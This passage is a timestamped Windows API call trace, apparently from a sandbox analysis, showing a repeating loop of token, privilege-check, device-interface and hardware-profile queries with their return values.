RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.673] SetLastError (dwErrCode=0x522) [0084.673] CloseHandle (hObject=0x114) returned 1 [0084.673] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.673] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.673] GetLastError () returned 0x578 [0084.673] SetLastError (dwErrCode=0x578) [0084.673] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.673] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.673] GetCurrentThread () returned 0xfffffffe [0084.673] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.673] GetLastError () returned 0x3f0 [0084.673] GetCurrentProcess () returned 0xffffffff [0084.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.673] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.673] SetLastError (dwErrCode=0x522) [0084.673] CloseHandle (hObject=0x114) returned 1 [0084.673] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.673] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.673] GetLastError () returned 0x578 [0084.673] SetLastError (dwErrCode=0x578) [0084.673] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.673] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.673] GetCurrentThread () returned 0xfffffffe [0084.674] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.769] GetLastError () returned 0x3f0 [0084.769] GetCurrentProcess () returned 0xffffffff [0084.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.769] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.769] SetLastError (dwErrCode=0x522) [0084.769] CloseHandle (hObject=0x114) returned 1 [0084.769] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.769] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.769] GetLastError () returned 0x578 [0084.769] SetLastError (dwErrCode=0x578) [0084.769] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.769] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.769] GetCurrentThread () returned 0xfffffffe [0084.769] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.769] GetLastError () returned 0x3f0 [0084.769] GetCurrentProcess () returned 0xffffffff [0084.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.769] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.769] SetLastError (dwErrCode=0x522) [0084.769] CloseHandle (hObject=0x114) returned 1 [0084.769] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.769] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.769] GetLastError () returned 0x578 [0084.770] SetLastError (dwErrCode=0x578) [0084.770] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.770] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.770] GetCurrentThread () returned 0xfffffffe [0084.770] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.770] GetLastError () returned 0x3f0 [0084.770] GetCurrentProcess () returned 0xffffffff [0084.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.770] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.770] SetLastError (dwErrCode=0x522) [0084.770] CloseHandle (hObject=0x114) returned 1 [0084.770] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.770] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.770] GetLastError () returned 0x578 [0084.770] SetLastError (dwErrCode=0x578) [0084.770] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.770] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.770] GetCurrentThread () returned 0xfffffffe [0084.770] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.770] GetLastError () returned 0x3f0 [0084.770] GetCurrentProcess () returned 0xffffffff [0084.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.770] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.770] SetLastError (dwErrCode=0x522) [0084.770] CloseHandle (hObject=0x114) returned 1 [0084.770] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.770] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.770] GetLastError () returned 0x578 [0084.770] SetLastError (dwErrCode=0x578) [0084.770] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.770] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.770] GetCurrentThread () returned 0xfffffffe [0084.770] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.770] GetLastError () returned 0x3f0 [0084.770] GetCurrentProcess () returned 0xffffffff [0084.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.770] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.770] SetLastError (dwErrCode=0x522) [0084.770] CloseHandle (hObject=0x114) returned 1 [0084.770] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.770] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.770] GetLastError () returned 0x578 [0084.770] SetLastError (dwErrCode=0x578) [0084.770] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.770] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.771] GetCurrentThread () returned 0xfffffffe [0084.771] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.771] GetLastError () returned 0x3f0 [0084.771] GetCurrentProcess () returned 0xffffffff [0084.771] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.771] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.771] SetLastError (dwErrCode=0x522) [0084.771] CloseHandle (hObject=0x114) returned 1 [0084.771] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.771] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.771] GetLastError () returned 0x578 [0084.771] SetLastError (dwErrCode=0x578) [0084.771] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.771] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.771] GetCurrentThread () returned 0xfffffffe [0084.771] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.771] GetLastError () returned 0x3f0 [0084.771] GetCurrentProcess () returned 0xffffffff [0084.771] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.771] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.771] SetLastError (dwErrCode=0x522) [0084.771] CloseHandle (hObject=0x114) returned 1 [0084.771] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.771] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.771] GetLastError () returned 0x578 [0084.771] SetLastError (dwErrCode=0x578) [0084.771] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.771] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.771] GetCurrentThread () returned 0xfffffffe [0084.771] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.771] GetLastError () returned 0x3f0 [0084.771] GetCurrentProcess () returned 0xffffffff [0084.771] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.771] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.771] SetLastError (dwErrCode=0x522) [0084.771] CloseHandle (hObject=0x114) returned 1 [0084.771] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.771] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.771] GetLastError () returned 0x578 [0084.771] SetLastError (dwErrCode=0x578) [0084.771] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.771] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.772] GetCurrentThread () returned 0xfffffffe [0084.772] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.772] GetLastError () returned 0x3f0 [0084.772] GetCurrentProcess () returned 0xffffffff [0084.772] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.772] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.772] SetLastError (dwErrCode=0x522) [0084.772] CloseHandle (hObject=0x114) returned 1 [0084.772] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.772] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.772] GetLastError () returned 0x578 [0084.772] SetLastError (dwErrCode=0x578) [0084.772] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.772] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.772] GetCurrentThread () returned 0xfffffffe [0084.772] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.772] GetLastError () returned 0x3f0 [0084.772] GetCurrentProcess () returned 0xffffffff [0084.772] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.772] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.772] SetLastError (dwErrCode=0x522) [0084.772] CloseHandle (hObject=0x114) returned 1 [0084.772] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.772] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.772] GetLastError () returned 0x578 [0084.772] SetLastError (dwErrCode=0x578) [0084.772] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.772] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.772] GetCurrentThread () returned 0xfffffffe [0084.772] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.772] GetLastError () returned 0x3f0 [0084.772] GetCurrentProcess () returned 0xffffffff [0084.772] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.772] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.772] SetLastError (dwErrCode=0x522) [0084.773] CloseHandle (hObject=0x114) returned 1 [0084.773] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.773] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.773] GetLastError () returned 0x578 [0084.773] SetLastError (dwErrCode=0x578) [0084.773] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.773] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.773] GetCurrentThread () returned 0xfffffffe [0084.773] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.773] GetLastError () returned 0x3f0 [0084.773] GetCurrentProcess () returned 0xffffffff [0084.773] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.773] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.773] SetLastError (dwErrCode=0x522) [0084.773] CloseHandle (hObject=0x114) returned 1 [0084.773] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.773] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.773] GetLastError () returned 0x578 [0084.773] SetLastError (dwErrCode=0x578) [0084.773] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.773] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.773] GetCurrentThread () returned 0xfffffffe [0084.773] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.773] GetLastError () returned 0x3f0 [0084.773] GetCurrentProcess () returned 0xffffffff [0084.773] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.773] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.773] SetLastError (dwErrCode=0x522) [0084.773] CloseHandle (hObject=0x114) returned 1 [0084.773] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.773] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.773] GetLastError () returned 0x578 [0084.773] SetLastError (dwErrCode=0x578) [0084.773] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.773] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.773] GetCurrentThread () returned 0xfffffffe [0084.773] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.774] GetLastError () returned 0x3f0 [0084.774] GetCurrentProcess () returned 0xffffffff [0084.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.774] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.774] SetLastError (dwErrCode=0x522) [0084.774] CloseHandle (hObject=0x114) returned 1 [0084.774] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.774] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.774] GetLastError () returned 0x578 [0084.774] SetLastError (dwErrCode=0x578) [0084.774] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.774] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.774] GetCurrentThread () returned 0xfffffffe [0084.774] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.774] GetLastError () returned 0x3f0 [0084.774] GetCurrentProcess () returned 0xffffffff [0084.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.774] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.774] SetLastError (dwErrCode=0x522) [0084.774] CloseHandle (hObject=0x114) returned 1 [0084.774] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.774] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.774] GetLastError () returned 0x578 [0084.774] SetLastError (dwErrCode=0x578) [0084.774] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.774] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.774] GetCurrentThread () returned 0xfffffffe [0084.774] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.774] GetLastError () returned 0x3f0 [0084.774] GetCurrentProcess () returned 0xffffffff [0084.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.774] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.774] SetLastError (dwErrCode=0x522) [0084.774] CloseHandle (hObject=0x114) returned 1 [0084.774] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.774] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.774] GetLastError () returned 0x578 [0084.774] SetLastError (dwErrCode=0x578) [0084.774] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.774] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.774] GetCurrentThread () returned 0xfffffffe [0084.774] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.774] GetLastError () returned 0x3f0 [0084.774] GetCurrentProcess () returned 0xffffffff [0084.774] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.774] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.775] SetLastError (dwErrCode=0x522) [0084.775] CloseHandle (hObject=0x114) returned 1 [0084.775] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.775] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.775] GetLastError () returned 0x578 [0084.775] SetLastError (dwErrCode=0x578) [0084.775] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.775] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.775] GetCurrentThread () returned 0xfffffffe [0084.775] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.775] GetLastError () returned 0x3f0 [0084.775] GetCurrentProcess () returned 0xffffffff [0084.775] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.775] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.775] SetLastError (dwErrCode=0x522) [0084.775] CloseHandle (hObject=0x114) returned 1 [0084.775] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.775] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.775] GetLastError () returned 0x578 [0084.775] SetLastError (dwErrCode=0x578) [0084.775] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.775] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.775] GetCurrentThread () returned 0xfffffffe [0084.775] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.775] GetLastError () returned 0x3f0 [0084.775] GetCurrentProcess () returned 0xffffffff [0084.775] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.775] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.775] SetLastError (dwErrCode=0x522) [0084.775] CloseHandle (hObject=0x114) returned 1 [0084.775] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.775] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.775] GetLastError () returned 0x578 [0084.775] SetLastError (dwErrCode=0x578) [0084.775] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.775] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.775] GetCurrentThread () returned 0xfffffffe [0084.775] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.776] GetLastError () returned 0x3f0 [0084.776] GetCurrentProcess () returned 0xffffffff [0084.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.776] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.776] SetLastError (dwErrCode=0x522) [0084.776] CloseHandle (hObject=0x114) returned 1 [0084.776] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.776] CM_Get_Device_Interface_List_SizeA (in: 